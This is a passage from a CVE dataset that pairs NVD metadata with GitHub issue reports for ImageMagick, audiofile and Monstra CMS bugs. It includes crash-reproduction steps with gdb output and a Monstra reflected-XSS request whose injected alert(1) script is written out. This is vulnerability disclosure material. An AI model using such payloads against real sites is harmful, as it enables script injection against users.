"versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "35364557-83E3-4807-8D93-84BF17E01075", "versionEndExcluding": "11.6.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "11.5.2", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D3F7911-FB00-4612-9109-9E7A407BC7B7", "versionEndExcluding": "12.1.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B547F46F-5563-4E7F-8B69-3D25C6C58521", "versionEndExcluding": "13.1.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "1261AE74-41AF-4848-9AD9-46918C46845B", "versionEndExcluding": "14.1.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "14.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "1549C41F-9467-42C6-AF4B-644900495590", "versionEndExcluding": "15.0.1.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "15.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "45920B7E-10A6-4066-87AB-60D584689891", "versionEndExcluding": "15.1.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "15.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "DC9ED27E-9096-4A7D-96A7-E3F47E747D73", "versionEndExcluding": "11.6.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "11.5.2", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "02CB8916-A9ED-4935-BFBD-5C9E8D45379E", "versionEndExcluding": "12.1.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "5853A161-2F92-4298-A70A-03A66DED157C", "versionEndExcluding": "13.1.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "E0C65C13-C852-4A12-BFC0-A4DB201FFCAF", "versionEndExcluding": "14.1.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "14.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "CDE4FB3F-887D-48FC-B5F7-E06FA8AAEF30", "versionEndExcluding": "15.0.1.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "15.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "0064DE79-D6D6-4AE0-BF10-BF91FF9158DF", "versionEndExcluding": "15.1.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "15.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/ImageMagick/ImageMagick/issues/1599
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> ``` /* ----- Load RLE compressed raster ----- */ BImgBuff=(unsigned char *) AcquireQuantumMemory((size_t) ldblk, sizeof(*BImgBuff)); /*Ldblk was set in the check phase*/ if(BImgBuff==NULL) goto NoMemory; offset=SeekBlob(image,6 /*sizeof(Header)*/,SEEK_SET); ``` (https://github.com/ImageMagick/ImageMagick/blob/master/coders/cut.c#L552) We should initialize the BImgBuff, otherwise an use-of-uninitialized vulnerability occurs, which is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6780 (fixed in https://github.com/ImageMagick/ImageMagick/commit/a85ab26099152be3dab0bd377670abfc815b9fe7 and https://github.com/ImageMagick/ImageMagick/commit/81bfff2759854654bf07e452bf3b9b329f3c55e5 ) and https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5710 (fixed in https://github.com/ImageMagick/ImageMagick/commit/ce433f8048b120b2a0413b4ac3ef59fca35a9788 and https://github.com/ImageMagick/ImageMagick/commit/81bfff2759854654bf07e452bf3b9b329f3c55e5). <!-- Thanks for reporting the issue to ImageMagick! -->
Use of uninitialized value in function ReadCUTImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1599/comments
2
2019-06-18T10:33:40Z
2019-07-03T01:30:23Z
https://github.com/ImageMagick/ImageMagick/issues/1599
457,391,875
1,599
467
CVE-2019-13136
2019-07-01T20:15:11.417
ImageMagick before 7.0.8-50 has an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe5f4b85e6b1b54d3b4588a77133c06ade46d891" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1602" }, { "source": "cve@mitre.org", "tags": null, "url": "https://support.f5.com/csp/article/K03512441?utm_source=f5support&amp%3Butm_medium=RSS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe5f4b85e6b1b54d3b4588a77133c06ade46d891" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1602" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://support.f5.com/csp/article/K03512441?utm_source=f5support&amp%3Butm_medium=RSS" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "024CF82C-BA9A-441D-80DD-BDA9FEC819A7", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/ImageMagick/ImageMagick/issues/1602
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible integer overflow vulnerability in TIFFSeekCustomStream in coder/tiff.c ``` case SEEK_CUR: { if ((profile->offset+offset) < 0) return(-1); profile->offset+=offset; break; } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/tiff.c#L259 This issue is similar to the one which was fixed in https://github.com/ImageMagick/ImageMagick/commit/8b28a8708ca994c7c9f211d562a8109621cf4d15 and https://github.com/ImageMagick/ImageMagick/commit/114be1716d0a8a10df6f772ef558968a2ad9ab68.
Possible integer overflow in TIFFSeekCustomStream in coder/tiff.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1602/comments
2
2019-06-18T11:47:50Z
2019-07-03T01:30:44Z
https://github.com/ImageMagick/ImageMagick/issues/1602
457,432,764
1,602
468
CVE-2019-13137
2019-07-01T20:15:11.493
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadPSImage in coders/ps.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/35ccb468ee2dcbe8ce9cf1e2f1957acc27f54c34" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1601" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/7d11230060fa9c8f67e53c85224daf6648805c7b" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/35ccb468ee2dcbe8ce9cf1e2f1957acc27f54c34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/7d11230060fa9c8f67e53c85224daf6648805c7b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA", "versionEndExcluding": "6.9.10-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1601
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a memory leak issue in ReadPSImage in coder/ps.c ``` page_geometry=GetPageGeometry(option); flags=ParseMetaGeometry(page_geometry,&page.x,&page.y,&page.width, &page.height); if (flags == NoValue) { (void) ThrowMagickException(exception,GetMagickModule(),OptionError, "InvalidGeometry","`%s'",option); image=DestroyImage(image); return((Image *) NULL); } page.width=(size_t) ceil((double) (page.width*image->resolution.x/delta.x) -0.5); page.height=(size_t) ceil((double) (page.height*image->resolution.y/ delta.y) -0.5); page_geometry=DestroyString(page_geometry); fitPage=MagickTrue; ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/ps.c#L740 It is possible that page_geometry is not destroyed since there is a return statement before it. It is the issue which is similar to the one fixed in https://github.com/ImageMagick/ImageMagick/commit/15be797d622655244e4c57cc5e9e4cba013011f8
Memory leak in ReadPSImage in coder/ps.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1601/comments
2
2019-06-18T11:02:58Z
2019-07-03T01:31:05Z
https://github.com/ImageMagick/ImageMagick/issues/1601
457,404,400
1,601
469
CVE-2019-13147
2019-07-02T00:15:10.397
In Audio File Library (aka audiofile) 0.3.6, there exists one NULL pointer dereference bug in ulaw2linear_buf in G711.cpp in libmodules.a that allows an attacker to cause a denial of service via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mpruett/audiofile/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mpruett/audiofile/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00006.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:audio_file_library_project:audio_file_library:0.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "47CD841B-F23D-41F5-B31D-51A7B377BA75", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/mpruett/audiofile/issues/54
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mpruett", "audiofile" ]
There exists one NULL pointer dereference bug in ulaw2linear_buf, in G711.cpp, which allows an attacker to cause a denial of service via a crafted file. To reproduce with the attached poc file: ./sfconvert poc output format voc [poc.zip](https://github.com/mpruett/audiofile/files/3341808/poc.zip) gdb output ``` [----------------------------------registers-----------------------------------] RAX: 0xffff8284 RBX: 0x0 RCX: 0x7 RDX: 0x7e00 ('') RSI: 0x7d7c ('|}') RDI: 0xffffffff RBP: 0x7fffebce2010 --> 0x0 RSP: 0x7fffffffe2a0 --> 0x7ffff7b20ef6 (<afGetFrameCount(AFfilehandle, int)+390>: mov rax,QWORD PTR [rsp+0x10]) RIP: 0x7ffff7b388bf (<G711::runPull()+3199>: mov WORD PTR [rbx+r12*2],ax) R8 : 0x0 R9 : 0x55555576b648 --> 0x0 R10: 0x55555576af48 --> 0x3e9 R11: 0x246 R12: 0x0 R13: 0x0 R14: 0x1 R15: 0x55555576b120 --> 0x7ffff7dd3568 --> 0x7ffff7b39440 (<G711::~G711()>: lea rsp,[rsp-0x98]) EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7b388ac <G711::runPull()+3180>: lea rsp,[rsp+0x98] 0x7ffff7b388b4 <G711::runPull()+3188>: movzx edi,BYTE PTR [rbp+r12*1+0x0] 0x7ffff7b388ba <G711::runPull()+3194>: call 0x7ffff7b23370 <_af_ulaw2linear> => 0x7ffff7b388bf <G711::runPull()+3199>: mov WORD PTR [rbx+r12*2],ax 0x7ffff7b388c4 <G711::runPull()+3204>: add r12,0x1 0x7ffff7b388c8 <G711::runPull()+3208>: cmp QWORD PTR [rsp+0x10],r12 0x7ffff7b388cd <G711::runPull()+3213>: je 0x7ffff7b38348 <G711::runPull()+1800> 0x7ffff7b388d3 <G711::runPull()+3219>: nop [------------------------------------stack-------------------------------------] 0000| 0x7fffffffe2a0 --> 0x7ffff7b20ef6 (<afGetFrameCount(AFfilehandle, int)+390>: mov rax,QWORD PTR [rsp+0x10]) 0008| 0x7fffffffe2a8 --> 0x0 0016| 0x7fffffffe2b0 --> 0x61616161 ('aaaa') 0024| 0x7fffffffe2b8 --> 0x7ffff7b1ae32 (<afReadFrames(AFfilehandle, int, void*, int)+34>: mov rax,QWORD PTR [rsp+0x10]) 0032| 0x7fffffffe2c0 --> 0x0 0040| 0x7fffffffe2c8 --> 0x1 0048| 0x7fffffffe2d0 --> 0x55555576b360 --> 0x7fff00000003 0056| 0x7fffffffe2d8 --> 0x55555576af48 --> 0x3e9 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff7b388bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at G711.cpp:42 42 linear[i] = _af_ulaw2linear(ulaw[i]); gdb-peda$ bt #0 0x00007ffff7b388bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at G711.cpp:42 #1 G711::runPull (this=0x55555576b120) at G711.cpp:206 #2 0x00007ffff7b1b4b6 in afReadFrames (file=<optimized out>, trackid=<optimized out>, samples=0x0, nvframeswanted=<optimized out>) at data.cpp:222 #3 0x0000555555555f9e in copyaudiodata (infile=0x55555576ae90, outfile=0x55555576b6c0, trackid=0x3e9) at sfconvert.c:340 #4 0x00005555555555e1 in main (argc=argc@entry=0x5, argv=argv@entry=0x7fffffffe508) at sfconvert.c:248 #5 0x00007ffff76f3b97 in __libc_start_main (main=0x555555555370 <main>, argc=0x5, argv=0x7fffffffe508, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4f8) at ../csu/libc-start.c:310 #6 0x0000555555555c3a in _start () ```
NULL pointer dereference bug in ulaw2linear_buf, in G711.cpp
https://api.github.com/repos/mpruett/audiofile/issues/54/comments
5
2019-06-29T11:37:12Z
2023-11-11T17:47:19Z
https://github.com/mpruett/audiofile/issues/54
462,294,180
54
470
CVE-2018-11227
2019-07-03T16:15:09.943
Monstra CMS 3.0.4 and earlier has XSS via index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/438" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/44646" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/438" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/44646" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "66ED6E31-8A36-442A-861E-1279221D75BB", "versionEndExcluding": "3.0.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/monstra-cms/monstra/issues/438
[ "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
Hello team :) I found xss at index page I reported to the cve platform, they let me use CVE-2018-11227, you can contact them for details Request GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 Host: 192.168.1.106 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Response <script type="text/javascript"> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','_mga'); _mga('create', '', 'auto'); _mga('send', 'pageview', { 'page': 'http://192.168.1.106/test/monstra-3.0.4/?vrk2f%27-alert(1', 'title': '' }); </script></body> <form method="post"> <div class="form-group"> <label>Username</label> <input name="login" class="form-control" type="text" value="xci9j"><script>alert(1)</script>jiznp" /> </div> <div class="form-group"> <label>Captcha</label> <input type="text" name="answer" class="form-control"> <br> <table><tr><td><img id='cryptogram'
Monstra XSS Vulnerability @Awilum
https://api.github.com/repos/monstra-cms/monstra/issues/438/comments
1
2018-05-17T00:21:08Z
2019-07-04T10:28:06Z
https://github.com/monstra-cms/monstra/issues/438
323,831,067
438
471
CVE-2017-6216
2019-07-03T17:15:09.440
novaksolutions/infusionsoft-php-sdk v2016-10-31 is vulnerable to a reflected XSS in the leadscoring.php resulting code execution
